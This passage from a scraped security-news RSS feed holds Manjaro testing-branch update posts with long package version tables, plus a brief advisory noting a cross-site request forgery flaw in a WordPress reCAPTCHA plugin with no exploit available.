   firefox-developer-edition-i18n-bn            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-br            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-bs            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ca            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-ca-valencia      121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-cak            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-cs            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-cy            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-da            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-de            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-dsb            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-el            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-en-ca            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-en-gb            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-en-us            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-eo            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-es-ar            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-es-cl            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-es-es            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-es-mx            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-et            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-eu            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-fa            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ff            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-fi            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-fr            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-fur            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-fy-nl            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-ga-ie            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-gd            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-gl            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-gn            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-gu-in            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-he            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-hi-in            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-hr            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-hsb            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-hu            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-hy-am            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ia            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-id            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-is            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-it            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ja            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ka            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-kab            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-kk            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-km            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-kn            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ko            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-lij            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-lt            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-lv            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-mk            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-mr            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ms            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-my            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-nb-no            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-ne-np            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-nl            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-nn-no            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-oc            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-pa-in            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-pl            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-pt-br            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-pt-pt            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-rm            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ro            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ru            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-sc            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-sco            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-si            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-sk            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-sl            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-son            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-sq            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-sr            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-sv-se            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-szl            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ta            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-te            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-tg            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-th            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-tl            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-tr            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-trs            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-uk            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ur            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-uz            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-vi            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-xh            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-zh-cn            121.0b6-1            121.0b7-1
firefox-developer-edition-i18n-zh-tw            121.0b6-1            121.0b7-1
                             freetds              1.4.9-1             1.4.10-1
                               fwupd              1.9.9-1             1.9.10-1
                          fwupd-docs              1.9.9-1             1.9.10-1
                           git-annex       10.20230926-38       10.20230926-39
                            git-grab              1.0.1-1              2.0.0-1
                               glide              0.6.0-1              0.6.1-1
                               glirc         2.39.0.1-169         2.39.0.1-170
                    haskell-arch-web               0.2-72               0.2-73
                haskell-authenticate          1.3.5.1-226          1.3.5.1-227
                         haskell-aws              0.24-93              0.24-94
                 haskell-casa-client            0.0.1-651            0.0.1-652
                  haskell-cheapskate          0.1.1.2-605          0.1.1.2-606
                haskell-coinbase-pro          0.9.3.2-121          0.9.3.2-122
                haskell-crypto-token              0.0.2-1              0.0.2-2
                     haskell-crypton               0.33-6               0.34-1
             haskell-crypton-conduit             0.2.3-25             0.2.3-26
          haskell-crypton-connection             0.3.1-22             0.3.1-23
                haskell-crypton-x509             1.7.6-17             1.7.6-18
          haskell-crypton-x509-store             1.6.9-17             1.6.9-18
         haskell-crypton-x509-system             1.6.7-17             1.6.7-18
     haskell-crypton-x509-validation            1.6.12-17            1.6.12-18
                         haskell-dav            1.3.4-624            1.3.4-625
                      haskell-ghcide           1.9.1.0-22           1.9.1.0-23
           haskell-ghcide-test-utils          1.8.0.0-148          1.8.0.0-149
                     haskell-githash           0.1.6.3-99          0.1.6.3-100
                     haskell-hadrian          0.1.0.0-144          0.1.0.0-145
                      haskell-hakyll          4.16.0.0-92          4.16.0.0-94
                 haskell-hledger-lib              1.31-28               1.32-1
haskell-hls-alternate-number-format-plugin    1.3.0.0-108          1.3.0.0-109
         haskell-hls-brittany-plugin          1.1.0.0-116          1.1.0.0-117
        haskell-hls-cabal-fmt-plugin          0.1.0.0-108          0.1.0.0-109
            haskell-hls-cabal-plugin          0.1.0.0-108          0.1.0.0-109
   haskell-hls-call-hierarchy-plugin          1.2.0.0-108          1.2.0.0-109
haskell-hls-change-type-signature-plugin      1.1.0.0-108          1.1.0.0-109
            haskell-hls-class-plugin          1.1.1.0-108          1.1.1.0-109
       haskell-hls-code-range-plugin          1.1.0.0-108          1.1.0.0-109
             haskell-hls-eval-plugin          1.4.0.0-108          1.4.0.0-109
  haskell-hls-explicit-fixity-plugin          1.1.0.0-108          1.1.0.0-109
 haskell-hls-explicit-imports-plugin          1.2.0.0-108          1.2.0.0-109
haskell-hls-explicit-record-fields-plugin     1.0.0.0-108          1.0.0.0-109
         haskell-hls-floskell-plugin          1.0.2.0-109          1.0.2.0-110
         haskell-hls-fourmolu-plugin          1.1.1.0-114          1.1.1.0-115
             haskell-hls-gadt-plugin          1.0.1.0-108          1.0.1.0-109
                   haskell-hls-graph           1.9.0.0-82           1.9.0.0-83
 haskell-hls-haddock-comments-plugin          1.1.1.0-108          1.1.1.0-109
            haskell-hls-hlint-plugin          1.1.1.0-108          1.1.1.0-109
      haskell-hls-module-name-plugin          1.1.1.0-108          1.1.1.0-109
           haskell-hls-ormolu-plugin          1.0.3.0-112          1.0.3.0-113
              haskell-hls-plugin-api           1.6.0.0-94           1.6.0.0-95
          haskell-hls-pragmas-plugin          1.0.4.0-108          1.0.4.0-109
haskell-hls-qualify-imported-names-plugin     1.0.2.0-108          1.0.2.0-109
         haskell-hls-refactor-plugin          1.1.0.0-108          1.1.0.0-109
   haskell-hls-refine-imports-plugin          1.0.4.0-108          1.0.4.0-109
           haskell-hls-rename-plugin          1.0.2.0-108          1.0.2.0-109
           haskell-hls-retrie-plugin          1.0.3.0-108          1.0.3.0-109
           haskell-hls-splice-plugin          1.0.3.0-108          1.0.3.0-109
  haskell-hls-stylish-haskell-plugin          1.0.1.2-109          1.0.1.2-110
          haskell-hls-tactics-plugin          1.8.0.0-110          1.8.0.0-111
              haskell-hls-test-utils          1.5.0.0-108          1.5.0.0-109
                     haskell-hoauth2            2.2.0-121            2.2.0-122
                       haskell-hpack            0.35.2-82            0.35.2-83
                   haskell-hspec-wai           0.11.1-384           0.11.1-385
              haskell-hspec-wai-json           0.11.0-445           0.11.0-446
                        haskell-http         4000.4.1-159         4000.4.1-160
      haskell-http-client-restricted            0.0.5-148            0.0.5-149
             haskell-http-client-tls           0.3.6.3-31           0.3.6.3-32
                haskell-http-conduit           2.3.8.3-17           2.3.8.3-18
               haskell-http-download           0.2.1.0-44           0.2.1.0-45
                       haskell-http3             0.0.1-83             0.0.1-84
                   haskell-js-jquery            3.3.1-966            3.3.1-967
           haskell-lambdabot-trusted           5.3.1.2-17           5.3.1.2-18
             haskell-language-server           1.9.1.0-25           1.9.1.0-26
                    haskell-mustache             2.4.2-62             2.4.2-63
                        haskell-oeis           0.3.10-140           0.3.10-141
             haskell-optparse-simple          0.1.1.4-290          0.1.1.4-291
                      haskell-pandoc              3.1.6-9             3.1.6-11
           haskell-pandoc-lua-engine              0.2.1-8             0.2.1-10
               haskell-pandoc-server            0.1.0.1-8           0.1.0.1-10
                      haskell-pantry            0.5.7-191            0.5.7-192
                  haskell-pipes-http            1.0.6-565            1.0.6-566
                        haskell-quic              0.1.5-2              0.1.5-3
                   haskell-recaptcha          0.1.0.4-140          0.1.0.4-141
                         haskell-req            3.13.0-93            3.13.0-94
                      haskell-scotty            0.20.1-26            0.20.1-27
              haskell-servant-client             0.19-152             0.19-153
              haskell-servant-server           0.19.2-116           0.19.2-117
                       haskell-shake           0.19.6-144           0.19.6-145
                         haskell-tls             1.8.0-15             1.8.0-16
         haskell-tls-session-manager            0.0.4-355            0.0.4-356
                       haskell-typst           0.3.2.0-11            0.3.2.1-1
            haskell-wai-app-file-cgi           3.1.10-151           3.1.10-152
              haskell-wai-app-static             3.1.8-36             3.1.8-37
                   haskell-wai-extra         3.1.13.0-214         3.1.13.0-216
          haskell-wai-handler-launch          3.0.3.1-574          3.0.3.1-575
             haskell-wai-http2-extra            0.1.3-137            0.1.3-138
                  haskell-wai-logger            2.4.0-365            2.4.0-367
       haskell-wai-middleware-static            0.9.2-215            0.9.2-216
                        haskell-warp            3.3.30-23            3.3.30-24
                   haskell-warp-quic            0.0.0-154            0.0.0-155
                    haskell-warp-tls             3.4.3-25             3.4.3-26
                        haskell-wreq           0.5.4.2-37           0.5.4.2-38
                        haskell-wuss           2.0.1.1-32           2.0.1.1-33
                       haskell-yesod          1.6.2.1-166          1.6.2.1-167
                  haskell-yesod-auth          1.6.11.2-17          1.6.11.2-18
                  haskell-yesod-core           1.6.25.0-4           1.6.25.0-5
                  haskell-yesod-form             1.7.6-43             1.7.6-44
            haskell-yesod-persistent          1.6.0.8-231          1.6.0.8-232
                haskell-yesod-static          1.6.1.0-678          1.6.1.0-679
                  haskell-yesod-test            1.6.16-12            1.6.16-13
                              hcloud             1.37.0-1             1.40.0-1
                             hledger               1.32-2               1.32-3
                          hledger-ui               1.32-2               1.32-3
                         hledger-web               1.32-3               1.32-4
                              hoogle         5.0.18.3-215         5.0.18.3-216
                      hopenpgp-tools           0.23.7-175           0.23.7-176
                            hyprland             0.32.3-1             0.33.0-1
                 ibus-typing-booster             2.24.4-1             2.24.5-1
                               idris            1.3.4-171            1.3.4-172
                            ihaskell          0.10.4.0-43          0.10.4.0-44
                   jupyter-nbconvert             7.11.0-1             7.12.0-1
                      jupyter-server             2.11.1-1             2.11.2-1
                                just             1.16.0-1             1.16.0-3
                               lapce              0.3.0-1              0.3.1-1
                               lcms2               2.15-1               2.16-1
                             libavif              1.0.2-1              1.0.3-1
                          liblangtag              0.6.6-1              0.6.7-1
         libqaccessibilityclient-qt5              0.5.0-2              0.6.0-1
         libqaccessibilityclient-qt6              0.5.0-2              0.6.0-1
                             libvirt            1:9.9.0-2           1:9.10.0-1
                      libvirt-python            1:9.9.0-1           1:9.10.0-1
             libvirt-storage-gluster            1:9.9.0-2           1:9.10.0-1
        libvirt-storage-iscsi-direct            1:9.9.0-2           1:9.10.0-1
                                love               11.4-2               11.5-1
                             maturin              1.3.2-1              1.4.0-1
                              memray             1.10.0-1             1.11.1-1
                           mighttpd2             4.0.3-68             4.0.3-69
                           mitmproxy             10.1.5-1             10.1.5-2
                           musescore              4.1.1-2              4.1.1-3
                                 mvt              2.4.3-1              2.4.4-1
               netfilter-fullconenat      r73.0cf3b48-333      r73.0cf3b48-334
          netstandard-targeting-pack       8.0.0.sdk100-1       8.0.0.sdk100-2
                              nodejs             21.2.0-1             21.3.0-1
                               opera      105.0.4970.29-1      105.0.4970.34-1
                              paccat              0.2.0-2              1.0.0-1
                          pandoc-cli           0.1.1.1-22           0.1.1.1-24
                     pandoc-crossref          0.3.16.0-75          0.3.16.0-77
                         pandoc-plot             1.8.0-14             1.8.0-16
                  papirus-icon-theme           20231201-1           20231201-2
                               passt 2023_11_19.4f1709d-1 2023_12_04.b86afe3-1
                       perl-text-csv               2.03-1               2.04-1
                        php-igbinary             3.2.14-2             3.2.15-1
                 php-legacy-igbinary             3.2.14-2             3.2.15-1
                       pkcs11-helper             1.29.0-2             1.30.0-1
                           postgrest           10.0.0-183           10.0.0-184
                               psalm             5.16.0-1             5.17.0-1
                              pulumi             3.94.2-1             3.95.0-1
                    python-fonttools             4.44.3-1             4.46.0-1
                      python-geojson              3.0.1-2              3.1.0-1
                   python-lsp-server              1.8.0-1              1.9.0-1
                      python-maturin              1.3.2-1              1.4.0-1
                         python-path             16.7.1-1             16.8.0-1
                      python-pip-run              9.2.1-3                    -
                        python-pyqt6              6.6.0-3              6.6.1-1
               python-pytest-asyncio             0.21.1-1             0.22.0-1
                   python-pytest-bdd              7.0.0-1              7.0.1-1
                python-pytest-runner              6.0.0-5              6.0.1-1
                      python-pythran             0.14.0-1             0.14.0-2
                    python-rapidjson               1.12-1               1.13-1
                         python-ruff              0.1.6-1              0.1.7-1
                   python-setuptools           1:68.2.0-1           1:68.2.1-1
                        python-sybil              5.0.3-1              6.0.0-1
                              qtpass              1.4.0-1              1.4.0-2
                         release-plz             0.3.31-1             0.3.32-1
                  rime-pinyin-zhwiki   1:0.2.4.20231016-1   1:0.2.4.20231205-1
                                ruff              0.1.6-1              0.1.7-1
                       rust-analyzer           20231127-1           20231204-1
                          rustypaste             0.14.1-1             0.14.2-1
                               stack            2.7.5-394            2.7.5-395
                           syncthing             1.26.1-1             1.27.0-1
                  syncthing-discosrv             1.26.1-1             1.27.0-1
                  syncthing-relaysrv             1.26.1-1             1.27.0-1
                            taffybar             4.0.1-40             4.0.1-41
                      tamarin-prover             1.8.0-43             1.8.0-44
                             taskell           1.11.4-394           1.11.4-395
                    telegram-desktop             4.12.1-1             4.12.2-1
                               typst            1:0.9.0-1           1:0.10.0-1
         v2ray-domain-list-community     20231128180936-1     20231202050515-1
                         v2ray-geoip       202311230040-1       202311300040-1
                           v4l-utils             1.24.1-2             1.26.0-1
                             weechat              4.1.1-1              4.1.2-1
                              xmobar             0.46-103             0.46-104
                             yoshimi            2.3.1.2-1            2.3.1.3-1
                        yoshimi-data            2.3.1.2-1            2.3.1.3-1
                        yoshimi-docs            2.3.1.2-1            2.3.1.3-1
                         yoshimi-lv2            2.3.1.2-1            2.3.1.3-1
                  yoshimi-standalone            2.3.1.2-1            2.3.1.3-1
                  aspnet-runtime-7.0                    -      7.0.14.sdk114-2
           aspnet-targeting-pack-7.0                    -      7.0.14.sdk114-2
                           catch2-v2                    -            2.13.10-1
                  dotnet-runtime-7.0                    -      7.0.14.sdk114-2
                      dotnet-sdk-7.0                    -      7.0.14.sdk114-2
   dotnet-source-built-artifacts-7.0                    -      7.0.14.sdk114-2
           dotnet-targeting-pack-7.0                    -      7.0.14.sdk114-2
                            dtk6core                    -              6.0.2-1
                 epapirus-icon-theme                    -           20231201-2
                            tailspin                    -              2.2.0-4


:: Different overlay package(s) in repository kde-unstable x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-12-04           2023-12-05
-------------------------------------------------------------------------------
                                 ark23.08.3.r5244.gfa270780-123.08.3.r5245.gfe9db061-1
                            kalgebra23.08.3.r2262.g80f233a3-123.08.3.r2263.g392f55f3-1
                                kalk23.08.1.r819.g86d1cf4-123.08.1.r820.g4573b91-1
                            kdenlive23.08.3.r19148.ge5857e6bd-123.08.3.r19150.g90cb72782-1
                            kdisplay5.27.9.r1564.g78d160b-15.27.9.r1566.gd144d8a-1
                            keysmith23.08.1.r554.g0ade39d-123.08.1.r555.g76b0494-1
                         kfourinline23.08.3.r1174.g3ace7cb-123.08.3.r1175.ga2f40f5-1
                              kmines23.08.3.r1918.g14dc63b-123.08.3.r1920.gb260f41-1
                             knights23.08.3.r1338.g3fca3a4-123.08.3.r1339.g3cab8ea-1
                            kongress23.08.1.r428.gf5f0f1b-123.08.1.r429.gbcb9bcb-1
                             konsole23.08.3.r9307.gc34a16146-123.08.3.r9310.gaed2dd76d-1
                                krdc23.08.3.r1798.g5482ec5-123.08.3.r1799.g7a3e777-1
                             ksudoku23.08.3.r1301.gc0bfc19-123.08.3.r1302.g9b0a4cc-1
                            kweather23.08.1.r1069.g2c24376-123.08.1.r1070.g3d60b48-1
                                kwin5.27.9.r25713.g3cc8e9f13b-15.27.9.r25714.g5b4dce93e3-1
                        libkmahjongg23.08.3.r607.g4a9e67e-123.08.3.r608.gab41b5d-1
                  mauikit-imagetools3.0.1.r192.geb82b4f-13.0.1.r193.gf4a7c3b-1
                           spectacle23.08.3.r2111.g0881a996-123.08.3.r2112.g01b8ee98-1
                         cask-server                    - 3.0.1.r21.ga06979f-1


:: Different overlay package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-12-04           2023-12-05
-------------------------------------------------------------------------------
                lib32-gamescope-plus      3.13.13.plus1-1      3.13.16.plus1-1

</code></pre>
<p><a href="https://forum.manjaro.org/t/testing-update-2023-12-05-kernels-kde-plasma-gamescope-plus-tuxclocker/152811/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
            <p><small>17 posts - 13 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2023-12-05-kernels-kde-plasma-gamescope-plus-tuxclocker/152811">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-28167 | Vsourz Digital CF7 Invisible reCAPTCHA Plugin up to 1.3.3 on WordPress cross-site request forgery]]></title>
<description><![CDATA[A vulnerability has been found in Vsourz Digital CF7 Invisible reCAPTCHA Plugin up to 1.3.3 on WordPress and classified as problematic. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery.

This vulnerability was named CVE-2023-28167. The attack can be in...]]></description>
<link>https://tsecurity.de/de/1952770/sicherheitsluecken/cve-2023-28167-vsourz-digital-cf7-invisible-recaptcha-plugin-up-to-133-on-wordpress-cross-site-request-forgery/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1952770/sicherheitsluecken/cve-2023-28167-vsourz-digital-cf7-invisible-recaptcha-plugin-up-to-133-on-wordpress-cross-site-request-forgery/</guid>
<pubDate>Wed, 06 Dec 2023 16:16:36 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/?product.vsourz_digital:cf7_invisible_recaptcha_plugin">Vsourz Digital CF7 Invisible reCAPTCHA Plugin up to 1.3.3</a> on WordPress and classified as <a href="https://vuldb.com/?kb.risk">problematic</a>. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery.

This vulnerability was named <a href="https://vuldb.com/?source_cve.245038">CVE-2023-28167</a>. The attack can be initiated remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2023-12-05 - Kernels, Gamescope-Plus, TuxClocker]]></title>
<description><![CDATA[Hello community,
Another testing branch update with some usual package updates for you.

Get the lastest SoftMaker Office with ChatGPT buillt-in. You will find our Special Offer here!
Recent News:

Manjaro, like many other open-source projects, relies on the generosity of its community through do...]]></description>
<link>https://tsecurity.de/de/1951593/unix-server/testing-update-2023-12-05-kernels-gamescope-plus-tuxclocker/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1951593/unix-server/testing-update-2023-12-05-kernels-gamescope-plus-tuxclocker/</guid>
<pubDate>Tue, 05 Dec 2023 18:57:12 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello community,</p>
<p>Another <strong>testing</strong> branch update with some usual package updates for you.</p>
<p><img src="https://forum.manjaro.org/uploads/default/original/3X/4/2/42e8550ce72aa8ff000d704ed0fa0a698556b13e.jpeg" alt="image" data-base62-sha1="9xThw8e1scYGHvHqifKkf1T8ODQ" width="580" height="326"><br>
<em>Get the lastest <a href="https://www.softmaker.com/en/products/softmaker-office">SoftMaker Office with ChatGPT buillt-in</a>. You will find our <a href="https://softmaker.com/go/manjaro">Special Offer here</a>!</em></p>
<p><strong>Recent News:</strong></p>
<ul>
<li>Manjaro, like many other open-source projects, relies on the generosity of its community through <a href="https://manjaro.org/donate/">donations</a> and corporate sponsorships to support its growth and development. These <a href="https://manjaro.org/donate/">donations</a> are essential in covering the various expenses incurred in the operations of the project such as server costs, software development tools, infrastructure expenses, training, flying people to events or <a href="https://blog.manjaro.org/fosdem-2023/">conferences</a> and the salaries of key developers. With the help of these donations, Manjaro is able to secure the necessary financial stability that allows the project to continuously improve and remain active. If you love Manjaro, consider to <a href="https://manjaro.org/donate/">donate</a>!</li>
</ul>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2023-12-05-kernels-gamescope-plus-tuxclocker/152811/1">(click for more details)</a>
<p><strong>Notable Package Updates:</strong></p>
<ul>
<li>Some <strong>Kernels</strong> got updated
<ul>
<li>mostly changes due to hardware development for the ASUS ROG ALLY</li>
</ul>
</li>
<li><strong>tuxclocker</strong> is at <a href="https://www.phoronix.com/news/TuxClocker-1.4-Released">1.4.0</a></li>
<li><strong>gamescope-plus</strong> got updated to <a href="https://github.com/ChimeraOS/gamescope/releases/tag/3.13.16-plus1">3.13.16-plus1</a></li>
<li>Usual <strong>KDE-git</strong>, <strong>Haskell</strong> and <strong>Python</strong> updates</li>
</ul>
<h2><a name="additional-info-1" class="anchor" href="https://forum.manjaro.org/#additional-info-1"></a>Additional Info</h2>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2023-12-05-kernels-gamescope-plus-tuxclocker/152811/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux419 4.19.300</li>
<li>linux54 5.4.262</li>
<li>linux510 5.10.202</li>
<li>linux515 5.15.141</li>
<li>linux61 6.1.65</li>
<li>linux65 6.5.13 [EOL]</li>
<li>linux66 6.6.4</li>
<li>linux67 6.7-rc4</li>
<li>linux61-rt 6.1.64_rt17</li>
<li>linux65-rt 6.5.2_rt8</li>
<li>linux66-rt 6.6.0_rt15</li>
</ul>
<p><strong>Package Changes</strong> (Tue Dec 5 18:16:49 CET 2023)</p>
<ul>
<li>testing core x86_64:  6 new and 6 removed package(s)</li>
<li>testing extra x86_64:  367 new and 358 removed package(s)</li>
<li>testing kde-unstable x86_64:  19 new and 18 removed package(s)</li>
<li>testing multilib x86_64:  1 new and 1 removed package(s)</li>
</ul>
<pre><code class="lang-auto">:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-12-04           2023-12-05
-------------------------------------------------------------------------------
                          linux61-rt        6.1.59_rt16-1        6.1.64_rt17-1
                  linux61-rt-headers        6.1.59_rt16-1        6.1.64_rt17-1
                             linux66              6.6.4-2              6.6.4-4
                     linux66-headers              6.6.4-2              6.6.4-4
                             linux67           6.7.0rc4-1           6.7.0rc4-3
                     linux67-headers           6.7.0rc4-1           6.7.0rc4-3


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-12-04           2023-12-05
-------------------------------------------------------------------------------
             ayatana-indicator-sound            23.10.2-1            23.10.3-1
                      gamescope-plus      3.13.13.plus1-1      3.13.16.plus1-1
                linux61-rt-acpi_call             1.2.2-11             1.2.2-12
                 linux61-rt-bbswitch               0.8-11               0.8-12
              linux61-rt-broadcom-wl      6.30.223.271-11      6.30.223.271-12
             linux61-rt-nvidia-390xx           390.157-11           390.157-12
             linux61-rt-nvidia-470xx         470.223.02-2         470.223.02-3
                   linux61-rt-nvidia          545.29.06-1          545.29.06-2
                    linux61-rt-r8168           8.052.01-2           8.052.01-3
                linux61-rt-rtl8723bu          20220818-11          20220818-12
                 linux61-rt-tp_smapi               0.44-5               0.44-6
              linux61-rt-vhba-module          20211218-11          20211218-12
  linux61-rt-virtualbox-host-modules             7.0.12-2             7.0.12-3
                   linux66-acpi_call             1.2.2-15             1.2.2-17
                    linux66-bbswitch               0.8-15               0.8-17
                 linux66-broadcom-wl      6.30.223.271-15      6.30.223.271-17
                linux66-nvidia-390xx           390.157-15           390.157-17
                linux66-nvidia-470xx        470.223.02-16        470.223.02-18
                      linux66-nvidia         545.29.06-11         545.29.06-13
                       linux66-r8168          8.052.01-15          8.052.01-17
                   linux66-rtl8723bu          20220818-15          20220818-17
                    linux66-tp_smapi              0.44-15              0.44-17
                 linux66-vhba-module          20211218-15          20211218-17
     linux66-virtualbox-host-modules            7.0.12-15            7.0.12-17
                         linux66-zfs              2.2.2-2              2.2.2-4
                   linux67-acpi_call            1.2.2-0.4            1.2.2-0.6
                    linux67-bbswitch              0.8-0.4              0.8-0.6
                 linux67-broadcom-wl     6.30.223.271-0.4     6.30.223.271-0.6
                linux67-nvidia-390xx          390.157-0.4          390.157-0.6
                linux67-nvidia-470xx       470.223.02-0.3       470.223.02-0.5
                      linux67-nvidia        545.29.06-0.3        545.29.06-0.5
                       linux67-r8168         8.052.01-0.4         8.052.01-0.6
                    linux67-tp_smapi             0.44-0.4             0.44-0.6
                 linux67-vhba-module         20211218-0.4         20211218-0.6
     linux67-virtualbox-host-modules           7.0.12-0.4           7.0.12-0.6
                       steam-deckify           20231203-1           20231205-1
                          tuxclocker              1.3.2-1              1.4.0-1
                                warp              0.6.1-1              0.6.2-1


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-12-04           2023-12-05
-------------------------------------------------------------------------------
                             arch-hs          0.11.1.0-88          0.11.1.0-89
                      aspnet-runtime       8.0.0.sdk100-1       8.0.0.sdk100-2
               aspnet-targeting-pack       8.0.0.sdk100-1       8.0.0.sdk100-2
                               broot             1.29.0-1             1.30.0-1
                       cabal-install          3.4.1.0-157          3.4.1.0-158
                          cargo-hack             0.6.13-1             0.6.14-1
                              catch2             2.13.9-1            2.13.10-1
                               darcs           2.16.5-219           2.16.5-220
                               dhall           1.41.2-120           1.41.2-121
                          dhall-bash           1.0.40-231           1.0.40-232
                          dhall-docs            1.0.11-66            1.0.11-67
                          dhall-json           1.7.11-136           1.7.11-137
                    dhall-lsp-server            1.1.2-155            1.1.2-156
                          dhall-yaml           1.2.11-137           1.2.11-138
                         dotnet-host       8.0.0.sdk100-1       8.0.0.sdk100-2
                      dotnet-runtime       8.0.0.sdk100-1       8.0.0.sdk100-2
